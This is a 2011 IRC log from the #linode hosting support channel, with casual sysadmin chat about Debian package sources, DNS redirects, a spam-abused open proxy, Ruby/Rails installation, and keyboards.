Back to Home / #linode / 2011 / 08 / Prev Day | Next Day
#linode IRC Logs for 2011-08-10

---Logopened Wed Aug 10 00:00:14 2011
---Daychanged Wed Aug 10 2011
00:00-!-jboom [~jboom@216-164-125-3.c3-0.drf-ubr1.atw-drf.pa.cable.rcn.com] has joined #linode
00:00<apsqwla>akerl, its in the development version of php apparently
00:00<apsqwla>/usr/share/doc/php5/examples/php.ini-development
00:03<apsqwla>hrm or its my package source
00:03<apsqwla>PHP 5.3.6-6~dotdeb.1
00:06<mikegrb_>lulz
00:06<apsqwla>why is it doing montecarlo on pi lol
00:07-!-Bass10 [Bass10@c-76-113-194-7.hsd1.mn.comcast.net] has quit [Ping timeout: 480 seconds]
00:08<mikegrb_>mmm bacon
00:08<plorky>mikegrb_: bacon
00:11<kenyon>WormFood: maybe you should file a bug. ziproxy is not a very popular package.
00:13<WormFood>I tried to, but because ziproxy was an open proxy, spammers used it, and got my mail server blacklisted, so the debian bug service rejected my email
00:13<kenyon>fail
00:13<kenyon>that's unfortunate though
00:13<WormFood>pisses me off, because while I installed it, I never started the service, because I wasn't ready...when my linode went down and restarted, it started the open proxy.
00:14*akerl smiles at Arch. If I don't add it to rc.conf, it doesn't start
00:14<WormFood>fortunately I have my notifications configured to alert me for high bandwidth usage (actually set pretty low), so I was alerted to it fairly quickly (within a few hours)
00:15-!-pigdude [~tallen@c-69-143-181-131.hsd1.va.comcast.net] has joined #linode
00:15<apsqwla>what happened
00:15<apsqwla>oh spammers used it
00:15<apsqwla>how fast did they find it
00:15-!-pigdude [~tallen@c-69-143-181-131.hsd1.va.comcast.net] has quit []
00:16-!-pigdude [~tallen@c-69-143-181-131.hsd1.va.comcast.net] has joined #linode
00:16<akerl>apsqwla: dotdeb?
00:16<apsqwla>got it for php-fpm
00:16<WormFood>it didn't take long...on the order of hours
00:16<WormFood>rather clever...they just used it to connect to 127.0.0.1 to send their spam....I was able to clear it all out of the buffers for their spam that was still in the queue
00:16<@heckman>apsqwla: same
00:16<akerl>Meh. I'm not a fan of third party repos.
00:17<apsqwla>i would build my own package
00:17<WormFood>eventually I got a ticket from linode about it....*after* I had already resolved the problem....fortunately I could tell them it was already under control at that time.
00:17<apsqwla>but thats dumb
00:17*WormFood fuckin' HATES spammers
00:17<akerl>apsqwla: Why?
00:18<apsqwla>because someone already did it
00:18<akerl>...
00:18<akerl>That's not exactly solid logic
00:18<WormFood>I had one spammer use my domain as a return address on their email, so I was getting a lot of backscatter....I put a notice on my page saying spammers are allowed to use my email address as a return address, for the cost of $200 per email...they can agree to those terms by using my domain as a return address for their spam
00:18-!-bixgomez [~bixgomez@c-67-161-113-222.hsd1.wa.comcast.net] has joined #linode
00:18-!-bixgomez [~bixgomez@c-67-161-113-222.hsd1.wa.comcast.net] has quit [Remote host closed the connection]
00:18<WormFood>I then called up the company, and asked where do I send my bill to.....that shit stopped quickly afterwards. (at least through that company)
00:19-!-bixgomez [~bixgomez@c-67-161-113-222.hsd1.wa.comcast.net] has joined #linode
00:19-!-bob2 [rob@egads.ertius.org] has joined #linode
00:20<WormFood>and it they were selling something health related...I forget what...but I asked them if they really wanted to use the domain name "wormfood.net" in association with their products....maybe their products will turn people into worm food ;)
00:20-!-JSharp [~j@173-228-94-51.dsl.dynamic.sonic.net] has quit [Ping timeout: 480 seconds]
00:20<apsqwla>akerl, i would use used slackware if i wanted to build my own packages
00:20<akerl>apsqwla: Again, that's not sound logic for trusting 3rd party repos
00:20<apsqwla>is there an official debian repo with php-fpm
00:21<bob2>'sid'
00:21<kenyon>apsqwla: http://packages.debian.org/sid/php5-fpm
00:21<kenyon>it's also in wheezy
00:22<apsqwla>hmm i dont know what that means
00:22<apsqwla>so i just add it as a repo?
00:22<bob2>no
00:22<bob2>it's not lenny
00:22<akerl>apsqwla: Sid and wheezy. ie testing and unstable debian
00:22<akerl>Well, unstable and testing. But yea
00:22<apsqwla>thanks, so, can i cherry pick?
00:23<akerl>No
00:23<akerl>Not without a lot of care.
00:23<kenyon>you can try to use apt pinning, but I bet php has so many dependencies that it will be a mess
00:23<akerl>The real solution is to compile what you need from source.
00:23<dwfreed>i've found that out the hard way, trying to get python3.2 installed changed things and screwed me over
00:24<bob2>zomg
00:24<dwfreed>and i don't want to rebuild
00:24<bob2>don't add random crap to your sources.list
00:24<dwfreed>bob2: i don't
00:24<bob2>rebuilding the python3.2 source package is likely very very easy and safe
00:24<dwfreed>yes it is, but i wanted to use apt to manage it
00:24<apsqwla>akerl, yea, i could have
00:24<apsqwla>didnt feel like it
00:24<bob2>dwfreed: yes, this does let dpkg manage it
00:24<bob2>I said 'source package' not 'get tarball and install to /opt'
00:25<dwfreed>bob2: except the build-deps would likely still screw me over
00:25<bob2>i would be very surprised if the build-deps can't be satisfied in lenny
00:25-!-Nightmare [~Fire@190.209.175.190] has quit [Quit: Computer has gone to sleep.]
00:27-!-niemeyer [~niemeyer@72-254-82-76.client.stsn.net] has quit [Ping timeout: 480 seconds]
00:27<dwfreed>bob2: the source tarball will build in squeeze, but the build deps are way more than is needed, i'm sure
00:27-!-pigdude [~tallen@c-69-143-181-131.hsd1.va.comcast.net] has quit [Quit: Lost terminal]
00:27-!-AphisOne [~AphisOne@49-58.187-72.tampabay.res.rr.com] has joined #linode
00:30<dwfreed>i wish I could shoot debian for putting unicode characters in documentation when equivalent ASCII characters exist
00:30-!-JSharp [~j@173-228-94-51.dsl.dynamic.sonic.net] has joined #linode
00:31<dwfreed>I have rxvt-unicode, and screen is set up to use UTF-8 mode, but i'm still getting ?'s instead of the right characters
00:31<bob2>bdb5.1 is it
00:31<bob2>not sure if that's a real dependency or not
00:35<kenyon>dwfreed: try dpkg-reconfigure locales, I seem to remember that rebuild fixing things
00:37<kenyon>dwfreed: otherwise, try #debian
00:37<Knight>http://www.newegg.com/Product/Product.aspx?Item=N82E16823114018
00:37<akerl>"FULL MECHANICAL KEYS FOR SUPERIOR TACTILITY"
00:37<Knight>a rather good keybo for a shell access eh :D
00:37<akerl>meh
00:38<Knight>click clack click clack
00:38<Knight>each click sound for each character transmitted to leenodah servah
00:38*WormFood misses his model 86 IBM keyboard
00:38<Knight>what happened? @ woremacx
00:39<Knight>i mean WormFood
00:39<WormFood>next time my mom comes to visit me, I'm gonna see if she can bring me my keyboard from USA.
00:39<kerle>am I doing it wrong? that's about 15 times what I'd pay for a keyboard
00:39-!-sam350 [~sam350@c-98-207-99-240.hsd1.ca.comcast.net] has joined #linode
00:39<WormFood>I didn't bring it with me, when I left USA...I didn't feel it was important to bring a keyboard overseas.
00:40<WormFood>if you're ever taking a long trip, here is a suggestion....take everything you want to bring with you, and lay it out on your bed (or somewhere)...now, take 1/2 as much stuff as you laid out, and take twice as much money.
00:40<SamT>nick lbot
00:40<SamT>oops
00:40-!-SamT [~sam@c-98-238-172-142.hsd1.ca.comcast.net] has left #linode []
00:41<mikegrb_>lulz
00:41<Musfuut>lol
00:41-!-zeade [~Adium@c-69-181-136-75.hsd1.ca.comcast.net] has joined #linode
00:41<Knight>click clack click clack...
00:41*Knight releases some potter wasps into the room
00:43-!-magn3ts [~magn3ts@ip68-103-225-65.ks.ok.cox.net] has joined #linode
00:43<magn3ts>Is it possible to have an empty/wildcard cname?
00:44<WormFood>I did get a Lenovo keyboard, that is shaped very similar to my model 86, but it does not have that click
00:44<WormFood>there is a company in USA that bought the rights to that keyboard, and they still produce the same thing, just under a different name.
00:45-!-sivy [~sivy@ip98-167-222-209.ph.ph.cox.net] has quit [Remote host closed the connection]
00:45*nDuff hugs his Filco Majestouch
00:46<WormFood>once, I had a monochrome monitor kill my IBM XT keyboard (you remember, the one with F1-F10 on the left side of the keyboard)
00:46<Knight>http://www.overclock.net/keyboards/491752-mechanical-keyboard-guide.html @ WormFood
00:47<WormFood>the keyboard was sitting on my lap...and I reach up to wipe the dust off my monitor, and the static electricity traveled down my arm, to my body and my leg, to zap the keyboard's metal back
00:49<WormFood>thanks Knight, interesting stuff there.
00:49-!-Teckie [~Teckie@184.105.178.99] has quit [Ping timeout: 480 seconds]
00:50<Knight>i like daskeyboard silent, but now i like razer black ultimate better
00:50*magn3ts squeks
00:50-!-SamT [~sam@c-98-238-172-142.hsd1.ca.comcast.net] has joined #linode
00:50*Knight offers some olive oil
00:51-!-sivy [~sivy@ip98-167-222-209.ph.ph.cox.net] has joined #linode
00:51-!-AphisOne [~AphisOne@49-58.187-72.tampabay.res.rr.com] has quit [Read error: Connection reset by peer]
00:51-!-sivy [~sivy@ip98-167-222-209.ph.ph.cox.net] has quit [Remote host closed the connection]
00:51-!-AphisOne [~AphisOne@49-58.187-72.tampabay.res.rr.com] has joined #linode
00:52-!-AphisOne [~AphisOne@49-58.187-72.tampabay.res.rr.com] has left #linode []
00:53<WormFood>I also have extra keycaps, and a keycap puller for my IBM keyboard
00:53<WormFood>it was Unicomp that I was thinking of, that is making the old IBM keyboards now.
00:54<dwfreed>anybody seen ThinkGeek's 1500 dollar keyboard?
00:55<@heckman>oled
00:55<dwfreed>yep, that's what makes it so expensive, there's a screen under each key
00:55<dwfreed>makes it really easy to change keyboard layouts
00:55<Musfuut>I own one of those keyboards, it is awesome, I use it every day... then I wake up rubbing my eyes and get depressed for another day
00:56<dwfreed>Musfuut: brighter colors are the answer, and don't stare at it too long
00:57-!-heliostatic [~heliostat@c-76-21-42-228.hsd1.ca.comcast.net] has quit [Remote host closed the connection]
00:58-!-gadams [~IAmMrAwes@static-72-248-178-82.mas.onecommunications.net] has quit [Read error: Operation timed out]
01:01<mikegrb_>lulz
01:01<Musfuut>lol
01:02<kerle>heh $1600, out of stock, no ETA
01:03<pronto>i want!
01:03<Musfuut>Heh, I only wish I could afford to toss cash like that around for pretty toys. I'm get me the best linode package, and use it to serve a single page, showing the current time, in iceland.
01:03<pronto>no clue what it is, but i want!
01:08<magn3ts>Is it possible to have an empty/wildcard CNAME?
01:08-!-Teckie [~Teckie@184.105.178.99] has joined #linode
01:09<dwfreed>magn3ts: i don't think so, but i'm not an expert in DNS
01:09<Musfuut>magn3ts: For what purpose?
01:09<kenyon>magn3ts: how would that work?
01:09<magn3ts>Musfuut, to point my entire domain elsewhere.
01:09<aspect>wildcard yes, depending on your server/tool .. nfi what you mean by "empty"
01:09-!-ender|h [~ender@c-98-202-87-28.hsd1.ut.comcast.net] has joined #linode
01:10-!-DG_ [~DG@host86-175-32-206.wlms-broadband.com] has joined #linode
01:10<bob2>no you can't put a CNAME on domain.com
01:10-!-DG_ is now known as DarkG
01:10<magn3ts>wait. maybe I don't want a cname.
01:10<magn3ts>:/
01:10<aspect>wildcard in that sense.. not with any sane servers that I'm aware of
01:10<magn3ts>yeah, no, you're right
01:10<magn3ts>I'm being dumb here.
01:10<bob2>what are you trying to accomplish specifically
01:11<magn3ts>I own snh450.net. I want it to always redirect to snh450.net
01:11<akerl>Those are identical...
01:11<bob2>what
01:11<magn3ts>I own snh450.net. I want it to always redirect to usd450.net
01:11<mikegrb_>lulz
01:11<magn3ts>sorry, I make the same mistake lots of ppl do I guess, lol
01:11<bob2>snh450.net needs an A record pointing at a machine running a web server
01:12<bob2>configure that webserver to issue a permament redirect to the other domain
01:12<magn3ts>yeah, that's sinking in.
01:12<bob2>assuming you're talking about web stuff
01:12<akerl>Realistically, point both domains at the same web server.
01:12<magn3ts>I wanted to eliminate that webserver, and I'm doing it as a favor for the person that owns usd450. Not worth the effort, (yes, I know it's very minimal)
01:12<magn3ts>I don't know what I was thinking with CNAMEs, sorry guys. Thanks.
01:12<bob2>well someone needs a web server
01:12<bob2>anyone can host it
01:13<akerl>If the guy running usd450 has a webserver, just point snh450 at his IP, let him do with it as he wants
01:13<magn3ts>I can try pointing it at their server, but I don't know if they have ti configured to accept any hostname with their IIS.
01:13<magn3ts>akerl, yeah, that's what I'm going to do now I guess.
01:13-!-vraa [~vraa@c-76-30-144-32.hsd1.tx.comcast.net] has joined #linode
01:13<akerl>The better question is "Why do you own a domain, which you don't use, which someone else wants to use"
01:14<bob2>maybe it's the only domain on their server, then it Just Works anyway
01:14<bob2>but omg the google juice dilution from not redirecting
01:14<magn3ts>akerl, I offered to *give* it to them. They said "we don't want it". Yet there are hundreds of their patrons that hit my url every month.
01:14<akerl>Why do *you* own it?
01:14<magn3ts>I was originally going to do something with it before they even bought usd450.net
01:14<magn3ts>I was a student there...
01:14<bob2>is it a drug reference or a some obscure farenheit 450 reference
01:15<akerl>Do you have a current use for it?
01:15<magn3ts>akerl, nope
01:15<akerl>If not, just drop it's zone from the dns manager and let it expire
01:15<magn3ts>:[ I can't let go.
01:15<magn3ts>I'm like a pack rat.
01:16<akerl>Then make it proxy to their site, and flip all the content.
01:16<mikegrb_>lulz
01:16<magn3ts>lol, the big flash applet?
01:16<akerl>upsidedownternet
01:17<magn3ts>yeah, their firewall blocks it. :s oh well
01:17<magn3ts>goatse time
01:17<akerl>Their firewall does what now?
01:18-!-sm [~sm@76.89.151.175] has quit [Ping timeout: 480 seconds]
01:19<magn3ts>If you set a hosts entry and try it out, you get: Your firewall is not properly transmitting the original header for this request.
01:19<akerl>?
01:19<akerl>What does that have to do with anything?
01:19<magn3ts>That's the effect an A record pointed at them would be.
01:19<bob2>what
01:19<magn3ts>no?
01:20<akerl>Firstly, in order for the desired redirection to occur, they would need to configure things nicely on their server.
01:20<akerl>Secondly, this in no way affects your ability to pull an upsidedownternet on them
01:21<magn3ts>Well many times you can just point a domain at an IP address and they'll wildcard serve to it. They obviously don't have it setup this way.
01:21<bob2>unrelated
01:21<magn3ts>akerl, yeah, I wasn't trying to upsidedowninternet them, I would have to proxy all of that.
01:21<bob2>they have specifically filtered Host: headers
01:21<magn3ts>well, sure.
01:22<akerl>The real solution is "Lose the domain". Since you've rejected that, I've moved to plan B, which is "have fun with it"
01:22<magn3ts>I know, and I do appreciate the tips to have fun with it, I'm just migrating back to the "let it go" route.
01:23<akerl>Sadness that web.py doesn't work with python3
01:24<bob2>or drop the A
01:24<bob2>wsgi only came to python3 like 3 months ago
01:24-!-sivy [~sivy@ip98-167-222-209.ph.ph.cox.net] has joined #linode
01:25-!-Tom39Away [~tom@ool-457d6ac6.dyn.optonline.net] has quit [Read error: Operation timed out]
01:25-!-Tom39Away [~tom@ool-457d6ac6.dyn.optonline.net] has joined #linode
01:27<Musfuut>If I were to "turn off" the dns for a domain, and then turn it on before the 15 minute cycle would anything happen to the records or availability?
01:27<bob2>what does 'turn off' mean
01:27<@heckman>shouldn't
01:28<nDuff>Musfuut, that said -- the 15-minute cycle isn't based on what time you last made the change
01:28<nDuff>Musfuut, ...so if it happens 1 minute after you make the change...
01:28<Musfuut>bob2: By that I mean in the DNS manager, for the domain record, flip it to Inactive.
01:28<@heckman>If you did it now you'd have two minutes to flip it back on.
01:28-!-squircle [~squircle@d24-150-105-60.home.cgocable.net] has left #linode []
01:28<@heckman>Well, 1 minute to be safe
01:29<ajmitch>more to the point, why would you want to?
01:29<Musfuut>Ok, cool, I want to test a couple things on the api and want to have a chance to undo them before they propagate.
01:30<@heckman>Why not create a new zone?
01:30-!-sivy [~sivy@ip98-167-222-209.ph.ph.cox.net] has quit [Remote host closed the connection]
01:30<@heckman>Add New Master Zone -> subdomain.domain.tld
01:30<Musfuut>Wouldn't I need a domain for it? or doesn't it matter?
01:30<@heckman>You can create a new zone for a subdomain of your primary zone.
01:30<@heckman>Just make sure there are no records in that primary zone that match the sub.
01:31<Musfuut>oh I see, very cool suggestion, thank you heckman :D and all!
01:33<Musfuut>Oh btw, if no one has noticed, when I go to the Linodes tab it says I've used 3% of my monthly bandwidth, however if I go to the only linode I have it says 2%, they have been constantly out of sync since I joined. Small thing though really.
01:34<@heckman>Musfuut: That graph rounds up.
01:34<@heckman>The first one.
01:34<Musfuut>ah I see, so it is really like 2.56%
01:34<@heckman>Well, it rounds the transfer amount up.
01:34<@heckman>So when you add a new Linode, and you've used 0.00MB, it still shows as 1GB on the pool graph
01:35<Musfuut>Interesting
01:37<Musfuut>Yeah I understand, and I guess rounding up is better than down and running out at 99%
01:38<dwfreed>heckman: is it possible to fix the Host box on the dashboard so it actually provides the load average of the host?
01:38<@heckman>dwfreed: You mean the numerical value?
01:38<dwfreed>yes
01:38<@heckman>Doubtful. We don't release that type of information.
01:39<@heckman>I can push the suggestion along, but I can't guarantee implementation.
01:39<dwfreed>then why have it on the page?
01:39<@heckman>We're giving a generic value of the load
01:39<@heckman>idle, low, medium, high. Not specific numbers.
01:39<dwfreed>aka, always "Idle"
01:39<@heckman>It updates..
01:39<bob2>doesn't it currently show a "host is fucked" or "host is not fucked" value?
01:40<bob2>that's useful
01:40<@heckman>If the load on the host is high, it damn well says high.
01:40<dwfreed>it does indicate that the host is online
01:40<bob2>hah
01:40<@heckman>It indicates online status as well as the load. When it says idle it really means idle.
01:40<dwfreed>heckman: how many cores are in the hosts?
01:40<@heckman>It runs Dual Quad-Core Xeons.
01:41<@heckman>Some of the Xeons are HT as well.
01:41<@heckman>Hardware varies slightly across the fleet.
01:41<Musfuut>I guess by showing the exact number someone could place a load on the server of a specific amount note the effect and be able to calculate the exact amount of load to bring the server down, or get an idea of the specific hardware being used as a competitor or am I talking out my ass on this?
01:41<bob2>must be more than slightly, some people haven't rebooted since the Great Xen Migration
01:42<dcraig>I don't think you can bring the server down with a certain amount of load
01:42<bob2>I think it's not wanting to encourage speculation on nodes-per-host and/or stop people having a cry about loads that do not affect them
01:42<Musfuut>Come to think of it probably not
01:42<dcraig>the specific CPU on your linode is in /proc/cpuinfo
01:42<@heckman>I was going to make a urmom joke there...but it was a little too raunchy even for me.
01:43<Musfuut>hahaha
01:43<bob2>is anyone left on UML?
01:44<dwfreed>i ran some processes that put my cpu usage at 400% and the host box didn't change at all; even if the procs are HT dual quad-core xeons, i would have thought i would have brought it up to low
01:44<@heckman>If the other Linodes aren't doing much, 4 threads is like a fart in the wind.
01:44<@heckman>s/is/are/
01:45-!-cereal is now known as cereal|Away
01:45<Musfuut>I haven't done much on linode yet, I have hopefully many years of service with them. On my previous to last host, a hybrid shared hosting, it was so annoying, someone would always do something on their portion and cause high load then your own stuff was slow. Linode has been so nice so far in that, and I haven't been contacted by staff for just making
01:45<Musfuut>an archive without niceing the process
01:46<@heckman>When I went to the NJ facility to help install some software I deployed Gentoo from my phone and emerged the world just so I could watch the HDD lights flicker...
01:46<@heckman>s/software/hardware/
01:46<purrdeta>lolol nice
01:46-!-Nightmare [~Fire@190.209.175.190] has joined #linode
01:47<Musfuut>very nice
01:47<StevenK>heckman: I like doing that on my media box at home
01:47<StevenK>Watching the HDD lights flicker, not installing Gentoo
01:47<dwfreed>heckman: while i had gentoo on mine (4GB), i emerged world at least twice
01:48<@heckman>I emerged the world and about 45 minutes later I heard my phone go off. CPU/Disk alerts.
01:48-!-ircuser-1_ [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has quit [Ping timeout: 480 seconds]
01:48<@heckman>I got a sick laugh out of the fact I was being e-mailed about Disk/CPU when I was literally touching my host to give it good luck.
01:48<Musfuut>I once installed gentoo on a system connected to dialup... so sloooow x_x
01:48<@heckman>Well...now that I think about it the e-mails came after I molested my host
01:49<kerle>can you do that in NJ?
01:49<@heckman>Molest servers. I think it's legal...
01:49<kerle>hmm
01:49<@heckman>And I don't mean waitresses.
01:49<@heckman>I believe that is illegal...
01:49<kerle>oh, that must be it
01:50<Musfuut>i think you need to turn on the server first, then it isn't technically molesting it
01:50<dwfreed>the first time i got the usage notices, i went on and disabled all of them except the network limit warning
01:52<dcraig>I use the absence of usage notices to let me know when the machine has gone offline
01:54<@heckman>Completely off topic, but does anyone know where I can get a swing-arm desk lamp that can sit pretty high.
01:55<@heckman>All the ones I have are too low and the light is blaring in my eye as I am reading.
01:55<dwfreed>heckman: there's always the stiff cardboard box
01:56<@heckman>True, but desk space is of the essence here.
01:57<Musfuut>Could get a positionable head lamp, some rechargeable batteries, and a charger.
01:57-!-ircuser-1_ [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has joined #linode
01:58<@heckman>Hm, I may have found one...
01:59-!-ircuser-1_ [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has quit [Read error: Connection reset by peer]
01:59<kerle>The one I was trying to remember can be found on Amazon
02:00-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has quit [Ping timeout: 480 seconds]
02:00-!-CompWizrd [compwiz@d24-57-202-59.home.cgocable.net] has joined #linode
02:03-!-davidw [~davidw@151.95.127.212] has joined #linode
02:06<@heckman>winner; http://www.lite-source.com/PHOTOS/LSC-162BLK.jpg
02:06<@heckman>Well maybe
02:06<dwfreed>(Debian) How do I find packages that have been installed from unstable in aptitude?
02:07<Musfuut>Nice heckman, I've always been annoyed that the clamps are so small. I've had placement problems before
02:08-!-CompWizrd [compwiz@d24-57-202-59.home.cgocable.net] has quit [Remote host closed the connection]
02:08<@heckman>I may just mod my desk to handle it.
02:09<Musfuut>My brother did that once, worked pretty good, if you do make a hole to accept it, make sure you install a thick washer or two between it and the desk, else you wear a large hole around the smaller one
02:11<@heckman>Found it on Amazon for the cheap
02:11<@heckman>"You save: $137.50"
02:11<dwfreed>wow, that's real cheap
02:12<dwfreed>almost stolen cheap
02:12<@heckman>Well, still $65.00...but still
02:12-!-epochwolf [~epochwolf@c-24-22-164-206.hsd1.wa.comcast.net] has quit [Quit: Leaving...]
02:12<kerle>dwfreed: ?installed?archive(unstable)
02:16-!-mina [~mina@c-76-21-118-71.hsd1.ca.comcast.net] has joined #linode
02:17<dwfreed>kerle: with unstable in sources.list, that matces every installed package with a version in unstable; without unstable in sources.list, it matches nothing so does that mean I don't have any packages installed from unstable?
02:18<kerle>hmm
02:18-!-Tigeda [~Tigeda@CPE-120-146-205-205.static.vic.bigpond.net.au] has joined #linode
02:19<mina>I'm trying to get our website running on linode, it's a ruby on rails website, can I just follow instruction on Ubuntu for installing ruby adn rails ? or do I need to do something specific?
02:20<kerle>dwfreed: I'm not sure
02:20<dcraig>mina, there are some library guides...
02:20<dcraig>http://library.linode.com/frameworks/ruby-on-rails-apache/ubuntu-10.04-lucid
02:20<dcraig>for example
02:20<kerle>mina: there are many guides out there for that, but you need to decide up front about apt versus gems
02:23<@heckman>And your sanity
02:23*heckman shudders
02:24<kerle>and there's that
02:24<kerle>a foregone conclusion for me, but there's hope for mina
02:24<+linbot>New news from forums: CPU hits 400% on graphs and cannot access my Linode in General Discussion <http://forum.linode.com/viewtopic.php?t=7538>
02:25-!-ircuser-1 [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has joined #linode
02:25<@heckman>dwfreed: apt-cache -t unstable --installed dumpavail
02:25<@heckman>That may wrok
02:25<@heckman>s/wrok/work/
02:25<@heckman>I've not tried it tho...
02:26<dcraig>regarding that forum thread, "Free swap = 0kb" doesn't look good
02:26<dwfreed>heckman: just dumps all packages from unstable
02:26<dwfreed>but i'll investigate into apt-cache
02:26<mina>great thanks!
02:26<@heckman>Or maybe... apt-cache -t unstable --installed dump
02:30<+linbot>New news from forums: Server gets frozen on random in General Discussion <http://forum.linode.com/viewtopic.php?t=7514>
02:30-!-walterheck [~walterhec@78.180.87.129] has joined #linode
02:30<kerle>oh, never mind, the linode guide takes the gems route
02:31<dwfreed>I love the Debian mirror I use; i know the people that run it
02:31-!-wkl [~wkl@61.135.152.207] has quit [Quit: wkl]
02:34<kerle>there's an extremely fast Ubuntu mirror near me, but sadly further from my linode
02:35<@heckman>I find it funny the "us" Ubuntu archives is in the UK
02:35<mikegrb_>lulz
02:35<dwfreed>lol
02:36<kerle>heh. is it hosted by Canonical?
02:36<StevenK>They are, yes
02:36-!-takamichi [Takamichi@c127-2.i07-32.onvol.net] has joined #linode
02:37<bob2>hard to find people to donate that much bandwidth
02:38<bob2>though surprised it's not at osuosl noawadays
02:38-!-Tigeda [~Tigeda@CPE-120-146-205-205.static.vic.bigpond.net.au] has quit [Remote host closed the connection]
02:39-!-Tigeda [~Tigeda@CPE-120-146-205-205.static.vic.bigpond.net.au] has joined #linode
02:41-!-Nightmare [~Fire@190.209.175.190] has quit [Remote host closed the connection]
02:42-!-ircuser-1 [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has quit [Ping timeout: 480 seconds]
02:49<dwfreed>bob2: the university that I attend doesn't mind donating the bandwidth to run Ubuntu, Debian, Gentoo, Arch, Fedora, CentOS, Slackware, and Kernel.org mirrors (Those are the major ones; it also has Unity and Ultimate Boot CD mirrors)
02:49<bob2>sure, that's one thing, but becoming the official us mirror for ubuntu is probably gigabits-95%
02:50<chesty>there are 100s of mirrors in the usa, just no one wants to be the us.ubuntu.com dns alias
02:51-!-ircuser-1 [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has joined #linode
02:52-!-andrew [~andrew@70.134.98.138] has joined #linode
02:55<dwfreed>With some major script foo, i can grab the list of installed packages, then run through and find from where APT gets its info on the package (mirror lists or installed list)
02:56<mina>I tried to install ruby by running, "sudo apt-get install ruby-full build-essential" but it installed 1.8, i need to install 1.9, i read online i need to download the gz file, is ther a faster upgrade command or someting?
02:56<dwfreed>mina: not a sane one, no
02:57<mina>dwfreed: ah too bad...
02:57<kerle>mina: do you also need a specific version of rails?
02:59<kerle>mina: if so, you may get stuck trying to do it all through apt
02:59<mina>kerle: yeah Rails 3.0.4, with ruby 1.9.2p180, but once i get ruby working i can get rails whatever version through Gem files...
02:59<mina>kerle: any suggestions?
02:59<kerle>mina: yes, for Rails 3 use gems, not apt
02:59<mina>kerle: yup I will :)
03:00<bob2>script foo?
03:00<bob2>apt-cache policy packagename
03:00<bob2>or apt-show-versions
03:02-!-sam350 [~sam350@c-98-207-99-240.hsd1.ca.comcast.net] has quit [Ping timeout: 480 seconds]
03:02<+linbot>New news from forums: Inter-Datacenter VPN/Private Network. in Feature Request/Bug Report <http://forum.linode.com/viewtopic.php?t=7539>
03:05-!-ktabic [~ktabic@host81-139-94-147.in-addr.btopenworld.com] has joined #linode
03:09<dwfreed>well, if i wrote my script foo right, i have no packages not from stable installed, yay
03:11<kerle>the description of apt-show-versions looks spot on for what you're after
03:12<dwfreed>wow, that's a long pipe: fgrep 'Package: ' /var/lib/dpkg/status | awk '{ print $2; }' | xargs -n 1 ./test.sh | fgrep '/var/lib/dpkg/status' | fgrep -v 'stable' | less
03:12<dwfreed>test.sh has 2 lines: echo $1; apt-cache showpkg $1
03:13<dwfreed>although the echo disappears anyway
03:13<dwfreed>so i could shorten that
03:14<chesty>what ae you trying to do dwfreed ?
03:14<@heckman>Turn his debian install into Arch Linux. :p
03:14<dwfreed>chesty: check to see if i have any packages not from stable installed, as i have testing and unstable in sources.list if necessary
03:16<dwfreed>i suppose apt-show-versions probably would have worked, but i wanted to see if i could do it myself
03:17-!-DrJ [~Bacon@67.237.34.90] has quit [Quit: Bye]
03:17-!-DarkG [~DG@host86-175-32-206.wlms-broadband.com] has quit [Read error: Connection reset by peer]
03:18-!-DarkG [~DG@host86-175-32-206.wlms-broadband.com] has joined #linode
03:18<chesty>here's one tip, you don't need to pipe grep into awk, awk '/Package: / { print $2}'
03:19<dwfreed>i've never used awk for anything besides that, so i'm not familiar with the full language
03:20<chesty>that's cool, just giving you one tip
03:20-!-sam350 [~sam350@c-98-207-99-240.hsd1.ca.comcast.net] has joined #linode
03:21<SpaceHobo><redacted>
03:21<dwfreed>yep
03:23<chesty>area man still stinging from troll tries the same troll back (and fails)
03:24<dwfreed>okay, so apparently my script foo isn't right, as i still have several packages from testing
03:25-!-sidney [~sidney@pool-74-109-20-70.phlapa.fios.verizon.net] has joined #linode
03:26-!-ircuser-1_ [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has joined #linode
03:29-!-ircuser-1 [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has quit [Ping timeout: 480 seconds]
03:35-!-quuxman [~quuxman@li200-143.members.linode.com] has quit [Remote host closed the connection]
03:36-!-andrew [~andrew@70.134.98.138] has quit [Quit: Client Quit]
03:38-!-alnewkirk [~alnewkirk@pool-98-114-37-114.phlapa.fios.verizon.net] has quit [Read error: Connection reset by peer]
03:40<dwfreed>Woo, got xvfb to build!
03:43<dwfreed>now to compile python3.2
03:46-!-zeade [~Adium@c-69-181-136-75.hsd1.ca.comcast.net] has quit [Quit: Leaving.]
03:47-!-joyce [~cb935f35@chat.linode.com] has joined #linode
03:51-!-petemall [~petemall@99-99-38-103.lightspeed.sntcca.sbcglobal.net] has quit [Quit: petemall]
03:52-!-mina [~mina@c-76-21-118-71.hsd1.ca.comcast.net] has quit [Ping timeout: 480 seconds]
03:56-!-kerle [~kerle@c-24-16-184-108.hsd1.wa.comcast.net] has quit [Quit: Leaving]
03:59-!-alnewkirk [~alnewkirk@pool-98-114-37-114.phlapa.fios.verizon.net] has joined #linode
04:00-!-wkl [~wkl@61.135.152.207] has joined #linode
04:00-!-davidw [~davidw@151.95.127.212] has left #linode [Leaving]
04:01-!-ircuser-1_ [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has quit [Ping timeout: 480 seconds]
04:06-!-ender|a [~ender@c-98-202-87-28.hsd1.ut.comcast.net] has joined #linode
04:09-!-johnathanb [~johnathan@host86-184-183-89.range86-184.btcentralplus.com] has joined #linode
04:10-!-ircuser-1_ [~ircuser-1@025.205-93-216-nokia-dsl.dynamic.surewest.net] has joined #linode
04:11-!-tibra [~tibra@p5DD0AF9E.dip.t-dialin.net] has joined #linode
04:11-!-ender|h [~ender@c-98-202-87-28.hsd1.ut.comcast.net] has quit [Ping timeout: 480 seconds]
04:15<dcraig>I'm reading that fremont RFO
04:15<dcraig>can anyone explain what the difference is between an "N+1 UPS configuration" and a "1+1 electrical system"?
04:15<dcraig>bunch of meaningless gibberish
